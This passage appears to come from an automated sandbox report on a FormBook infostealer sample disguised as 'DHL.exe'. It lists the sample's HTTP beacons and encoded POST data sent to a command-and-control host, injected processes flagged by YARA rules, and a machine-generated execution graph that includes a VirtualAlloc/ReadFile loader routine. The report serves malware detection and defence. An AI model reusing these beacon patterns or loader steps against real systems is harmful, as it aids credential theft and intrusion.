                                                      Date: Tue, 17 Dec 2024 07:25:17 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      19192.168.2.84972969.57.163.64805164C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:25:18.882842064 CET1782OUTPOST /9er8/ HTTP/1.1
                                                      Host: www.startsomething.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-us
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Content-Length: 1240
                                                      Connection: close
                                                      Origin: http://www.startsomething.xyz
                                                      Referer: http://www.startsomething.xyz/9er8/
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Data Raw: 72 50 68 3d 2f 32 78 77 5a 6c 65 2b 67 4d 77 73 54 4f 66 4e 2b 65 77 71 73 4e 2b 79 72 50 73 62 4f 72 4a 53 6a 2f 6d 75 45 56 58 75 33 52 59 69 68 63 56 4c 43 5a 5a 4a 37 68 6c 46 6d 4b 59 36 35 2b 51 74 57 44 4d 58 73 6c 61 31 75 52 71 34 5a 46 45 58 56 31 45 70 4b 32 5a 73 38 67 38 65 61 31 34 2b 35 70 35 70 47 62 6f 52 2b 70 74 55 4a 41 77 79 65 4a 48 57 53 61 6d 5a 73 37 67 63 52 64 6a 41 59 31 34 7a 66 6d 73 31 54 71 76 76 38 2f 6e 74 62 71 2b 73 5a 73 68 4f 43 79 41 61 31 74 36 73 50 54 4d 69 73 71 42 75 59 39 32 47 78 68 32 6a 41 71 6f 65 58 63 70 2f 2f 50 75 79 71 64 32 42 42 67 39 76 4f 57 2f 65 6e 37 59 49 30 44 48 67 66 6c 68 36 4c 73 58 49 62 73 51 50 6c 64 74 78 67 75 35 4e 55 43 39 71 44 61 6c 47 75 6d 39 38 4e 44 63 41 6e 58 6b 75 47 4e 67 78 61 78 38 2b 6c 31 32 74 6d 51 53 45 62 63 36 7a 62 6b 57 4a 75 71 49 43 72 33 79 43 61 59 41 44 55 58 43 34 52 47 6c 46 73 4f 74 47 4d 41 77 2f 61 33 47 36 66 44 6b 4b 6d 58 4a 47 54 41 46 2f 49 75 31 47 38 37 55 52 2b 67 42 47 33 6e 67 42 4f 46 [TRUNCATED]
                                                      Data Ascii: rPh=/2xwZle+gMwsTOfN+ewqsN+yrPsbOrJSj/muEVXu3RYihcVLCZZJ7hlFmKY65+QtWDMXsla1uRq4ZFEXV1EpK2Zs8g8ea14+5p5pGboR+ptUJAwyeJHWSamZs7gcRdjAY14zfms1Tqvv8/ntbq+sZshOCyAa1t6sPTMisqBuY92Gxh2jAqoeXcp//Puyqd2BBg9vOW/en7YI0DHgflh6LsXIbsQPldtxgu5NUC9qDalGum98NDcAnXkuGNgxax8+l12tmQSEbc6zbkWJuqICr3yCaYADUXC4RGlFsOtGMAw/a3G6fDkKmXJGTAF/Iu1G87UR+gBG3ngBOFSN3nmNujH91qdF4r0ewnkLBQPsZDUv5wT7pUfPMdDcVohTLD8ltbYYX47Cjb+7apJR9oDpBtNvNJrrIdCNyLskjJ/A6huKT6C7oLm0iou6j/szL22YcVzUt4ZIbtWOySLu35P4ymaHZcvhmND964k9qwt6BC2SuhyyCPNr6wR6/fOFRnNq+2ooFlghZULyBc9kjy5CCC95a23cBI8aTok7RJ7kFglovHPKJO7fP/W3OrtnWGagkNcKJ8I91mdEVKM5Y8jj/XTmqoSLyCes5z+6Zl8OyB0A/U9lkJEFsbERW0A4sjJ1+GrT3nFl1QBn91NFuw7erQUuW0HtxeaoREUzlY5qR4OhcQQFkbJ056wzfqBMpc1NkTKALzfUR3vwGw3jl1bC489uWrDR1IDa4zLN4/aUyybB2sGX72vP5RfybSWxQ2A+R/TgXsDXKysY0+8of0MooEJlQQnuMkm6qvLGHMgnxVSecgJ405V54kNVs7L2Wm0SU3qNRwtC935eFwm9V9GBg5GzEDadUVhpLEPwO6ekpEtqg/bHRZYoXLhBNcCfpVtuVOgk39kIB0ij55jGJs2q/34Zyon1T+/7N91alN9/2G1ybS7F1zSuamdkSMX2Z2K7nEBVtL/Do1d6NxNBmgcjFIC9JP+BdEouusg9yMj2FAhGnOwa [TRUNCATED]
                                                      Dec 17, 2024 08:25:20.111902952 CET533INHTTP/1.1 404 Not Found
                                                      Date: Tue, 17 Dec 2024 07:25:19 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      20192.168.2.84973069.57.163.6480
                                                      TimestampBytes transferredDirectionData
                                                      Dec 17, 2024 08:25:22.866293907 CET471OUTGET /9er8/?rPh=y0ZQaQGYytoPYKDdgLZSit2uqdIxJa9e7dCpW1aT2gUHtttnVaZ37Rd6tJxE+MMiCUIjuSyOnxmaU3U+fVZaaX16+D89AnEZm+xwCYUrhMUvMxACYJDUe5GKortKSbmbEQ==&kVvpD=Bx4T HTTP/1.1
                                                      Host: www.startsomething.xyz
                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                      Accept-Language: en-us
                                                      Connection: close
                                                      User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                      Dec 17, 2024 08:25:24.122167110 CET548INHTTP/1.1 404 Not Found
                                                      Date: Tue, 17 Dec 2024 07:25:23 GMT
                                                      Server: Apache
                                                      Content-Length: 389
                                                      Connection: close
                                                      Content-Type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                      Click to jump to process

                                                      Click to jump to process

                                                      Click to dive into process behavior distribution

                                                      Click to jump to process

                                                      Target ID:0
                                                      Start time:02:23:11
                                                      Start date:17/12/2024
                                                      Path:C:\Users\user\Desktop\DHL.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\DHL.exe"
                                                      Imagebase:0x9a0000
                                                      File size:1'257'984 bytes
                                                      MD5 hash:12E3C1457416B5622F040F8E0EDC0298
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:low
                                                      Has exited:true

                                                      Target ID:2
                                                      Start time:02:23:15
                                                      Start date:17/12/2024
                                                      Path:C:\Windows\SysWOW64\svchost.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Users\user\Desktop\DHL.exe"
                                                      Imagebase:0xd60000
                                                      File size:46'504 bytes
                                                      MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1707823352.0000000003300000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1707521744.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.1708319650.0000000004B50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:4
                                                      Start time:02:23:32
                                                      Start date:17/12/2024
                                                      Path:C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe"
                                                      Imagebase:0x120000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2709918624.0000000003CB0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:5
                                                      Start time:02:23:33
                                                      Start date:17/12/2024
                                                      Path:C:\Windows\SysWOW64\wiaacmgr.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\SysWOW64\wiaacmgr.exe"
                                                      Imagebase:0x3d0000
                                                      File size:84'480 bytes
                                                      MD5 hash:2F1D379CE47E920BDDD2C50214457E0F
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2710446513.00000000045C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2710629488.0000000004610000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2700411137.0000000002850000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:low
                                                      Has exited:false

                                                      Target ID:6
                                                      Start time:02:23:47
                                                      Start date:17/12/2024
                                                      Path:C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files (x86)\HXuKNehwRCvCGVTvwbakJIecOePGhOvzkeSvzIpLOVeFCqeShBB\eYHtcsfFquWF.exe"
                                                      Imagebase:0x120000
                                                      File size:140'800 bytes
                                                      MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2712813686.0000000005030000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:10
                                                      Start time:02:23:59
                                                      Start date:17/12/2024
                                                      Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                      Imagebase:0x7ff6d20e0000
                                                      File size:676'768 bytes
                                                      MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                      Has elevated privileges:false
                                                      Has administrator privileges:false
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Reset < >

                                                        Execution Graph

                                                        Execution Coverage:2.9%
                                                        Dynamic/Decrypted Code Coverage:1.8%
                                                        Signature Coverage:3.3%
                                                        Total number of Nodes:1896
                                                        Total number of Limit Nodes:72
                                                        execution_graph 96953 9dcabc 96954 9dcac5 96953->96954 96956 9dcace 96953->96956 96957 9dc9bb 96954->96957 96977 9d2d74 GetLastError 96957->96977 96959 9dc9c8 96998 9dcada 96959->96998 96961 9dc9d0 97007 9dc74f 96961->97007 96964 9dc9e7 96964->96956 96967 9dca2a 97023 9d29c8 96967->97023 96970 9dca1d 96971 9dca25 96970->96971 96974 9dca42 96970->96974 97022 9cf2d9 20 API calls __dosmaperr 96971->97022 96973 9dca6e 96973->96967 97029 9dc625 26 API calls 96973->97029 96974->96973 96975 9d29c8 _free 20 API calls 96974->96975 96975->96973 96978 9d2d8a 96977->96978 96979 9d2d96 96977->96979 97030 9d320e 11 API calls 2 library calls 96978->97030 97031 9d4c7d 20 API calls 2 library calls 96979->97031 96982 9d2d90 96982->96979 96984 9d2ddf SetLastError 96982->96984 96983 9d2da2 96985 9d2daa 96983->96985 97032 9d3264 11 API calls 2 library calls 96983->97032 96984->96959 96987 9d29c8 _free 20 API calls 96985->96987 96989 9d2db0 96987->96989 96988 9d2dbf 96988->96985 96990 9d2dc6 96988->96990 96991 9d2deb SetLastError 96989->96991 97033 9d2be6 20 API calls FindHandler 96990->97033 97034 9d28a7 38 API calls _abort 96991->97034 96993 9d2dd1 96995 9d29c8 _free 20 API calls 96993->96995 96997 9d2dd8 96995->96997 96997->96984 96997->96991 96999 9dcae6 __FrameHandler3::FrameUnwindToState 96998->96999 97000 9d2d74 FindHandler 38 API calls 96999->97000 97005 9dcaf0 97000->97005 97002 9dcb74 __wsopen_s 97002->96961 97005->97002 97006 9d29c8 _free 20 API calls 97005->97006 97035 9d28a7 38 API calls _abort 97005->97035 97036 9d2f5e EnterCriticalSection 97005->97036 97037 9dcb6b LeaveCriticalSection _abort 97005->97037 97006->97005 97038 9c49a5 97007->97038 97010 9dc770 GetOEMCP 97012 9dc799 97010->97012 97011 9dc782 97011->97012 97013 9dc787 GetACP 97011->97013 97012->96964 97014 9d3820 97012->97014 97013->97012 97015 9d385e 97014->97015 97019 9d382e FindHandler 97014->97019 97049 9cf2d9 20 API calls __dosmaperr 97015->97049 97017 9d3849 RtlAllocateHeap 97018 9d385c 97017->97018 97017->97019 97018->96967 97021 9dcb7c 51 API calls 2 library calls 97018->97021 97019->97015 97019->97017 97048 9c4ead 7 API calls 2 library calls 97019->97048 97021->96970 97022->96967 97024 9d29d3 RtlFreeHeap 97023->97024 97028 9d29fc __dosmaperr 97023->97028 97025 9d29e8 97024->97025 97024->97028 97050 9cf2d9 20 API calls __dosmaperr 97025->97050 97027 9d29ee GetLastError 97027->97028 97028->96964 97029->96967 97030->96982 97031->96983 97032->96988 97033->96993 97036->97005 97037->97005 97039 9c49c2 97038->97039 97040 9c49b8 97038->97040 97039->97040 97041 9d2d74 FindHandler 38 API calls 97039->97041 97040->97010 97040->97011 97042 9c49e3 97041->97042 97046 9d2ec3 38 API calls __fassign 97042->97046 97044 9c49fc 97047 9d2ef0 38 API calls __fassign 97044->97047 97046->97044 97047->97040 97048->97019 97049->97018 97050->97027 97051 9a105b 97056 9a344d 97051->97056 97053 9a106a 97087 9c00a3 29 API calls __onexit 97053->97087 97055 9a1074 97057 9a345d __wsopen_s 97056->97057 97088 9aa961 97057->97088 97061 9a351c 97100 9a3357 97061->97100 97068 9aa961 22 API calls 97069 9a354d 97068->97069 97121 9aa6c3 97069->97121 97072 9e3176 RegQueryValueExW 97073 9e320c RegCloseKey 97072->97073 97074 9e3193 97072->97074 97077 9a3578 97073->97077 97085 9e321e _wcslen 97073->97085 97127 9bfe0b 97074->97127 97076 9e31ac 97137 9a5722 97076->97137 97077->97053 97080 9e31d4 97140 9a6b57 97080->97140 97082 9e31ee messages 97082->97073 97084 9a515f 22 API calls 97084->97085 97085->97077 97085->97084 97086 9a4c6d 22 API calls 97085->97086 97152 9a9cb3 97085->97152 97086->97085 97087->97055 97089 9bfe0b 22 API calls 97088->97089 97090 9aa976 97089->97090 97158 9bfddb 97090->97158 97092 9a3513 97093 9a3a5a 97092->97093 97180 9e1f50 97093->97180 97096 9a9cb3 22 API calls 97097 9a3a8d 97096->97097 97182 9a3aa2 97097->97182 97099 9a3a97 97099->97061 97101 9e1f50 __wsopen_s 97100->97101 97102 9a3364 GetFullPathNameW 97101->97102 97103 9a3386 97102->97103 97104 9a6b57 22 API calls 97103->97104 97105 9a33a4 97104->97105 97106 9a33c6 97105->97106 97107 9e30bb 97106->97107 97108 9a33dd 97106->97108 97110 9bfddb 22 API calls 97107->97110 97206 9a33ee 97108->97206 97112 9e30c5 _wcslen 97110->97112 97111 9a33e8 97115 9a515f 97111->97115 97113 9bfe0b 22 API calls 97112->97113 97114 9e30fe __fread_nolock 97113->97114 97116 9a516e 97115->97116 97120 9a518f __fread_nolock 97115->97120 97119 9bfe0b 22 API calls 97116->97119 97117 9bfddb 22 API calls 97118 9a3544 97117->97118 97118->97068 97119->97120 97120->97117 97122 9aa6dd 97121->97122 97123 9a3556 RegOpenKeyExW 97121->97123 97124 9bfddb 22 API calls 97122->97124 97123->97072 97123->97077 97125 9aa6e7 97124->97125 97126 9bfe0b 22 API calls 97125->97126 97126->97123 97130 9bfddb 97127->97130 97128 9cea0c ___std_exception_copy 21 API calls 97128->97130 97129 9bfdfa 97129->97076 97130->97128 97130->97129 97133 9bfdfc 97130->97133 97221 9c4ead 7 API calls 2 library calls 97130->97221 97132 9c066d 97223 9c32a4 RaiseException 97132->97223 97133->97132 97222 9c32a4 RaiseException 97133->97222 97135 9c068a 97135->97076 97138 9bfddb 22 API calls 97137->97138 97139 9a5734 RegQueryValueExW 97138->97139 97139->97080 97139->97082 97141 9a6b67 _wcslen 97140->97141 97142 9e4ba1 97140->97142 97145 9a6b7d 97141->97145 97146 9a6ba2 97141->97146 97143 9a93b2 22 API calls 97142->97143 97144 9e4baa 97143->97144 97144->97144 97224 9a6f34 97145->97224 97148 9bfddb 22 API calls 97146->97148 97149 9a6bae 97148->97149 97150 9bfe0b 22 API calls 97149->97150 97151 9a6b85 __fread_nolock 97150->97151 97151->97082 97153 9a9cc2 _wcslen 97152->97153 97154 9bfe0b 22 API calls 97153->97154 97155 9a9cea __fread_nolock 97154->97155 97156 9bfddb 22 API calls 97155->97156 97157 9a9d00 97156->97157 97157->97085 97162 9bfde0 97158->97162 97160 9bfdfa 97160->97092 97162->97160 97164 9bfdfc 97162->97164 97168 9cea0c 97162->97168 97175 9c4ead 7 API calls 2 library calls 97162->97175 97163 9c066d 97177 9c32a4 RaiseException 97163->97177 97164->97163 97176 9c32a4 RaiseException 97164->97176 97166 9c068a 97166->97092 97173 9d3820 FindHandler 97168->97173 97169 9d385e 97179 9cf2d9 20 API calls __dosmaperr 97169->97179 97171 9d3849 RtlAllocateHeap 97172 9d385c 97171->97172 97171->97173 97172->97162 97173->97169 97173->97171 97178 9c4ead 7 API calls 2 library calls 97173->97178 97175->97162 97176->97163 97177->97166 97178->97173 97179->97172 97181 9a3a67 GetModuleFileNameW 97180->97181 97181->97096 97183 9e1f50 __wsopen_s 97182->97183 97184 9a3aaf GetFullPathNameW 97183->97184 97185 9a3ae9 97184->97185 97186 9a3ace 97184->97186 97188 9aa6c3 22 API calls 97185->97188 97187 9a6b57 22 API calls 97186->97187 97189 9a3ada 97187->97189 97188->97189 97192 9a37a0 97189->97192 97193 9a37ae 97192->97193 97196 9a93b2 97193->97196 97195 9a37c2 97195->97099 97197 9a93c9 __fread_nolock 97196->97197 97198 9a93c0 97196->97198 97197->97195 97198->97197 97200 9aaec9 97198->97200 97201 9aaed9 __fread_nolock 97200->97201 97202 9aaedc 97200->97202 97201->97197 97203 9bfddb 22 API calls 97202->97203 97204 9aaee7 97203->97204 97205 9bfe0b 22 API calls 97204->97205 97205->97201 97207 9a33fe _wcslen 97206->97207 97208 9e311d 97207->97208 97209 9a3411 97207->97209 97211 9bfddb 22 API calls 97208->97211 97216 9aa587 97209->97216 97212 9e3127 97211->97212 97214 9bfe0b 22 API calls 97212->97214 97213 9a341e __fread_nolock 97213->97111 97215 9e3157 __fread_nolock 97214->97215 97217 9aa59d 97216->97217 97220 9aa598 __fread_nolock 97216->97220 97218 9ef80f 97217->97218 97219 9bfe0b 22 API calls 97217->97219 97219->97220 97220->97213 97221->97130 97222->97132 97223->97135 97225 9a6f46 97224->97225 97226 9a6f4c 97224->97226 97225->97151 97227 9bfe0b 22 API calls 97226->97227 97227->97225 97228 9a1098 97233 9a42de 97228->97233 97232 9a10a7 97234 9aa961 22 API calls 97233->97234 97235 9a42f5 GetVersionExW 97234->97235 97236 9a6b57 22 API calls 97235->97236 97237 9a4342 97236->97237 97238 9a93b2 22 API calls 97237->97238 97247 9a4378 97237->97247 97239 9a436c 97238->97239 97241 9a37a0 22 API calls 97239->97241 97240 9a441b GetCurrentProcess IsWow64Process 97242 9a4437 97240->97242 97241->97247 97243 9a444f LoadLibraryA 97242->97243 97244 9e3824 GetSystemInfo 97242->97244 97245 9a449c GetSystemInfo 97243->97245 97246 9a4460 GetProcAddress 97243->97246 97250 9a4476 97245->97250 97246->97245 97249 9a4470 GetNativeSystemInfo 97246->97249 97247->97240 97248 9e37df 97247->97248 97249->97250 97251 9a447a FreeLibrary 97250->97251 97252 9a109d 97250->97252 97251->97252 97253 9c00a3 29 API calls __onexit 97252->97253 97253->97232 97254 e15963 97257 e155d8 97254->97257 97256 e159af 97270 e13008 97257->97270 97260 e156a8 CreateFileW 97263 e156b5 97260->97263 97267 e15677 97260->97267 97261 e156d1 VirtualAlloc 97262 e156f2 ReadFile 97261->97262 97261->97263 97262->97263 97266 e15710 VirtualAlloc 97262->97266 97264 e158d2 97263->97264 97265 e158c4 VirtualFree 97263->97265 97264->97256 97265->97264 97266->97263 97266->97267 97267->97261 97267->97263 97268 e157d8 CloseHandle 97267->97268 97269 e157e8 VirtualFree 97267->97269 97273 e164e8 GetPEB 97267->97273 97268->97267 97269->97267 97275 e16488 GetPEB 97270->97275 97272 e13693 97272->97267 97274 e16512 97273->97274 97274->97260 97276 e164b2 97275->97276 97276->97272 97277 9af7bf 97278 9af7d3 97277->97278 97279 9afcb6 97277->97279 97280 9afcc2 97278->97280 97282 9bfddb 22 API calls 97278->97282 97370 9aaceb 97279->97370 97283 9aaceb 23 API calls 97280->97283 97284 9af7e5 97282->97284 97286 9afd3d 97283->97286 97284->97280 97285 9af83e 97284->97285 97284->97286 97304 9aed9d messages 97285->97304 97312 9b1310 97285->97312 97380 a11155 22 API calls 97286->97380 97289 9bfddb 22 API calls 97310 9aec76 messages 97289->97310 97291 9afef7 97295 9aa8c7 22 API calls 97291->97295 97291->97304 97293 9f4b0b 97386 a1359c 82 API calls __wsopen_s 97293->97386 97294 9f4600 97294->97304 97381 9aa8c7 97294->97381 97295->97304 97298 9aa8c7 22 API calls 97298->97310 97301 9c0242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97301->97310 97302 9afbe3 97302->97304 97305 9f4bdc 97302->97305 97311 9af3ae messages 97302->97311 97303 9aa961 22 API calls 97303->97310 97387 a1359c 82 API calls __wsopen_s 97305->97387 97307 9c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97307->97310 97308 9f4beb 97388 a1359c 82 API calls __wsopen_s 97308->97388 97309 9c00a3 29 API calls pre_c_initialization 97309->97310 97310->97289 97310->97291 97310->97293 97310->97294 97310->97298 97310->97301 97310->97302 97310->97303 97310->97304 97310->97307 97310->97308 97310->97309 97310->97311 97368 9b01e0 235 API calls 2 library calls 97310->97368 97369 9b06a0 41 API calls messages 97310->97369 97311->97304 97385 a1359c 82 API calls __wsopen_s 97311->97385 97313 9b17b0 97312->97313 97314 9b1376 97312->97314 97541 9c0242 5 API calls __Init_thread_wait 97313->97541 97315 9b1390 97314->97315 97316 9f6331 97314->97316 97389 9b1940 97315->97389 97319 9f633d 97316->97319 97545 a2709c 235 API calls 97316->97545 97319->97310 97321 9b17ba 97323 9b17fb 97321->97323 97325 9a9cb3 22 API calls 97321->97325 97327 9f6346 97323->97327 97329 9b182c 97323->97329 97324 9b1940 9 API calls 97326 9b13b6 97324->97326 97332 9b17d4 97325->97332 97326->97323 97328 9b13ec 97326->97328 97546 a1359c 82 API calls __wsopen_s 97327->97546 97328->97327 97335 9b1408 __fread_nolock 97328->97335 97331 9aaceb 23 API calls 97329->97331 97333 9b1839 97331->97333 97542 9c01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97332->97542 97543 9bd217 235 API calls 